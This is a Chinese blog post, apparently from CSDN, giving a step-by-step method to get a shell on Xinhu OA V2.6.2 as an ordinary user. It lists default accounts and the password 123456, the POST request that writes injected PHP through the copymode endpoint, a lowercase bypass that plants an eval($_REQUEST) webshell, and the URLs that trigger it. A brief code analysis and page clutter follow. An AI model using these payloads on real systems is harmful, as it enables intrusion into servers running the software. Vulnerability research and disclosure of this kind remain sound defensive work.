信呼OA普通用户权限getshell方法

最新推荐文章于 2025-02-13 12:13:05 发布
最新推荐文章于 2025-02-13 12:13:05 发布
阅读量1.8k 收藏 13
点赞数 4
文章标签: 安全 windows 网络 web安全 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C20220511/article/details/136472171
版权
本文详细描述了信呼OAV2.6.2版本的安全漏洞,包括如何利用getshell方法以及通过构造特定请求实现的任意文件写入漏洞,提醒用户注意更新和安全防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 前言

信呼OA是一款开源的OA系统,面向社会免费提供学习研究使用,采用PHP语言编写,搭建简单方便,在中小企业中具有较大的客户使用量。从公开的资产治理平台中匹配到目前互联中有超过1W+的客户使用案例。

信呼OA目前最新的版本是V2.6.2,发布时间是2023-12-22。作者整体上保持了较高的系统更频率,对历史爆出的安全问题也及时进行修复。目前网上能找到的信呼OA getshell的办法大多数是老版本或者是需要admin权限的,没有针对新版本进行getshell的思路。

0x02 步骤

本地搭建当前最新版的信呼OA系统V2.6.2,如下图所示。

图片

使用普通OA用户登陆,信呼OA安装之后默认存在账号diaochan/xiaoqiao/daqiao/rock/zhangfei/zhaozl等用户,密码都是123456。这里使用普通用户xiaoqiao登陆,然后构造下面的请求。

http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};phpinfo ();class a

图片

生成的文件访问如下(以下两种方式均可):

http://xinhu.test.com:8890/webmain/flow/input/mode_a%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aAction.php

http://xinhu.test.com:8890/webmain/model/flow/2%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aModel.php

图片

由于传递的参数值会被全部转化为小写字母(下一步的漏洞分析中会提到),导致我们不能在webshell中使用大写字母,所以并不能直接写一句话webshell。绕过方式是可以通过下面的方式来转化一下一句话木马。

http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};eval (strtoupper("eval (\$_request[1]);"));class a

运行之后访问下面的链接,由于链接中涉及到多个特殊字符,如果不清楚应该如何转义的请复制下面的链接。

http://xinhu.test.com:8890/webmain/flow/input/mode_a%7b%7d;eval%20(strtoupper(%22eval%20(%5c$_request%5b1%5d);%22));class%20aAction.php?1=echo%20md5(1);

图片

0x03 分析

在webmain/main/flow/flowAction.php文件中,其中copymodeAjax接收外部用户传入的参数,如下图所示。

图片

继续跟踪createtxt方法,如下所示,仅仅只是进行了文件写入操作,并没有进行过滤,导致任意文件写入漏洞。

图片

盛邦安全
关注
OA nickName SQL注入漏洞复现(XVE-2024-19304)
0xSec
08-03 1373
OAnickName 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的息(例如,管理员后台密码、站点的用户个人息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2785
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私或评论,接下来会持续更新。
开源oa-php
05-10
这是一款php开源办公系统,有请假、调休、加班申请、上下班打卡,人事管理、行政管理等等强大的功能。
OA办公系统sql注入漏洞分析
最新发布
2301_80552914的博客
02-13 1351
payload解释:漏洞的位置在webmain/task/api/uploadAction.php中的getmfilv方法中,d传task参数表示在webadmin/task目录下,m传upload|api,第一部分 upload 会被赋值给 $m,第二部分 api 会被赋值给 $_m,表示。api下的uploadAction.php文件,a传getmfilv文件表示调用uploadAction.php的、getmfilv()方法,fname传sql注入的payload,进行base64编码。
漏洞披露--OA
无问社区的博客
09-09 992
泛微数字化运营管理平台OA为组织提供从“可数字身份、电子化流程审批、个性化岗位息门户、 知识文档管理、电子化签署到内外协同的业务管理”OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感息。建议升级到最新版本已修复。
协同办公系统-存储型XSS漏洞
chaojixiaojingang
09-20 2049
1.影响版本 1.9.0-1.9.1版本 2.漏洞复现 (1)搭建完成,进入登陆界面 (2)输入刚开始安装时设置的管理员usname paword,点击登陆,然后抓包查看传参,再去寻找登陆模块的源代码,根据传参的追踪,我们很快就能追踪到这个文件“webmain\model\loginMode.php”,在这个登陆文件loginMode.php的第209行到215行发现了addlogs()函数 (3)之后在logModel.php中发现了addlog()函数的定义 (4)这里是获取了
泛微OA日志与故障排查:提升IT运维效率的关键技巧
本文首先介绍了泛微OA系统以及日志的基本概念和结构,随后深入分析了日志分析的基础知识,包括日志文件的解析、日志分析工具的选择与应用以及日志息的提取与报告生成。接着,本文探讨了泛微OA系统故障诊断与排查的...
通达OA漏洞利用技术探讨:action_upload.php的深入分析
[通达OA漏洞利用技术探讨:action_upload.php的深入分析](https://opengraph.githubassets.com/2984e48853390d1c94f4a30fe0c508ce1b9304db6fbd7339ec8dce91ccd68994/Threekiii/Awesome-POC) # 摘要 本论文详细分析...
OA系统工作流WebService接口的持续集成与部署:构建自动化流程的12个关键点
本文综合探讨了OA系统和WebService接口的集成与部署过程,着重于持续集成的理论与实践、WebService接口的自动化测试与部署、OA系统工作流的优化改进,以及集成部署过程中的安全考量。通过对比不同持续集成工具和测试...
ym——Andorid-15k+的面试题。
热门推荐
陈宇明
08-07 2万+
最近才开的博客,希望大家多多关注,andorid开发也做了3年有余了,也面试很多加企业,借此机会分享一下,我们中遇到过的问题以及解决方案吧,希望能够对正在找工作的andoird程序员有一定的帮助。学完本人博客发表《ym--andorid从零开始教程》+面试题目全理解,年薪18w以上绝对没问题。 特别献上整理过的50道面试题目 1.listView的优化方式 重用conve
oa_v1.8.1.zip
03-20
oa是一个不错的企业办公系统。通过软件能移动办公,上传并保存办公文件,员工内部交流,发布工作任务等
OA系统开源v1.9.9.zip
01-16
1、服务器选择 选用windows操作系统的服务器。 1、配置要求至少:2G内存,2核的CPU,带宽看自己,低于此配置服务器就比较卡。 2、操作系统版本:建议使用windows server 2012 64位 纯净版。 3、PHP的运行环境:IIS(一般是系统自带)+Mysql5.5以上+PHP5.6以上。 选用Linux操作系统的服务器。 1、配置要求至少:1G内存,1核的CPU,任何配置都可以。 2、操作系统版本:Centos7以上 64位。 3、PHP的运行环境:Nginx/Apache+Mysql5.5以上+PHP5.6以上。
协同办公OA系统源代码
03-18
协同办公OA系统是开源的一款办公系统,跨平台的系统,支持APP,pc网页版,pc客户端等。 协同办公OA系统特点: 1、让每个企业单位都有自己的工作系统。 2、移动,免费开源工作系统,数据全部自己管理。 3、自定义管理应用,模块数据,权限分配。 4、单
协同办公OA系统 v2.6.2.zip
04-02
协同办公OA系统 v2.6.2.zip
OA系统2.1.7版源码
04-28
是一套免费开源的协同办公系统,为各大中小企业通用型在线办公管理系统,精简,便捷方便使用的管理软件,让每个企业单位都有属于自己的办公系统。
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9836
尽可能的搜集目标的息 端口息 DNS息 员工邮箱 息搜集的分类 1、主动式息搜集(可获取到的息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关息,如通过Nmap扫描目标系统。 3、被动式息搜集(搜集到的息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关息。如通过搜索引擎方式来搜集息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
OA index.php SQL注入
iSee857的博客
09-01 737
OA系统2.6.2版本的/webmain/task/openapi/openmodhetongAction.php文件中,存在一个前台SQL注入漏洞。当$nickName变量经过base64解码后被加入到uarr数组中,并最终传递给$db->record()方法进行SQL查询时,攻击者可以利用此漏洞进行SQL注入攻击。在index.php接口中参数nickName可通过base64编码形式绕过检测导致sql注入。Fofa:app="-OA系统"关闭互联网暴露面或接口设置访问权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值